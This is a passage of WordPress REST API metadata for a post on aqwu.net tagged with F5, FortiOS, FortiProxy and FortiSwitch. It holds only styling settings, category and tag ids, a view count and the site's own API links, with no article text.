center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[43,17],"tags":[179,180,181,182],"class_list":["post-784","post","type-post","status-publish","format-standard","hentry","category-infoarticle","category-infonews","tag-f5","tag-fortios","tag-fortiproxy","tag-fortiswitch"],"views":1414,"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/784","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=784"}],"version-history":[{"count":2,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/784\/revisions"}],"predecessor-version":[{"id":791,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/784\/revisions\/791"}],"wp:attachment":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}